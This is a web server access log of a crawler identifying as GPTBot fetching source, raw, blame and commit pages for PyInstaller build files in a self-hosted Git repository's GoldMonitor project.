"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" -[17/Feb/2026:14:58:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 9939] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:14:58:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10941] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs" -[17/Feb/2026:14:58:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10942] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs" -[17/Feb/2026:14:58:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14308] [Gzip 8.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:58:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:58:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73550] [Gzip 20.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:58:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21808] [Gzip 12.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:14:58:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 23987] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:14:58:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10942] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs" -[17/Feb/2026:14:58:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:58:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:14:58:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:14:58:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:58:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9933] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:58:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73568] [Gzip 20.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:58:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10941] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs" -[17/Feb/2026:14:58:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:58:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9932] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:58:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14329] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:58:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:58:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9931] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:58:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14329] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:58:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10941] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs" -[17/Feb/2026:14:58:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10941] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs" -[17/Feb/2026:14:58:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10916] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:58:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9911] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:58:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9933] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:58:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73568] [Gzip 20.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:58:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10915] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:58:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:58:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9913] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:58:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10916] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:58:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9910] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:14:58:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21828] [Gzip 12.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:14:58:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21827] [Gzip 12.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:14:58:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9932] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:14:58:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9932] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:14:58:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73542] [Gzip 20.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:58:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10916] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:58:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14301] [Gzip 8.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:58:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:58:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:58:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14301] [Gzip 8.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:58:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:58:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr 